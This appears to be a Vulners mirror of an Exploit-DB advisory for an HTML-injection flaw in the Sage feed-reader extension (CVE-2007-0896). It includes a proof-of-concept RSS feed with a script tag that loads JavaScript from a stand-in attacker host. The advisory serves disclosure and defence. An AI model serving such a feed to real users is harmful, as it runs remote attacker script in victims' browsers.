Lucene search
+L

Sage 1.3.6 - Extension Feed HTML Injection

🗓️ 09 Feb 2007 00:00:00Reported by FukumoriType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Sage 1.3.6 - Extension Feed HTML Injectio

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-0896
13 Feb 200711:00
cve
Cvelist
CVE-2007-0896
13 Feb 200711:00
cvelist
EUVD
EUVD-2007-0892
7 Oct 202500:30
euvd
Japan Vulnerability Notes
Sage vulnerable to arbitrary script execution
20 May 200815:00
jvn
NVD
CVE-2007-0896
13 Feb 200711:28
nvd
OSV
CGA-RCRQ-W5Q3-HG35
12 Jan 202613:53
osv
Prion
Cross site scripting
13 Feb 200711:28
prion
Positive Technologies
PT-2007-6354 · Oracle +1 · Jdk +3
8 Oct 200700:00
ptsecurity
Rosalinux
Advisory ROSA-SA-2024-2370
12 Mar 202408:35
rosalinux
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
9 Nov 200600:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/22493/info

Sage Extension Feed is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Hostile HTML and script code may be injected into vulnerable sections of the application. When viewed, this code may be rendered in the browser of a user viewing a malicious RSS feed.

Sage Extension Feed 1.3.9 is vulnerable to this issue; prior versions may also be affected.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"


<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<SCRIPT/=''SRC='http://atackersite/xss.js'></SCRIPT>
]]>
</content:encoded>
</item>
</channel>
</rss>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01878
21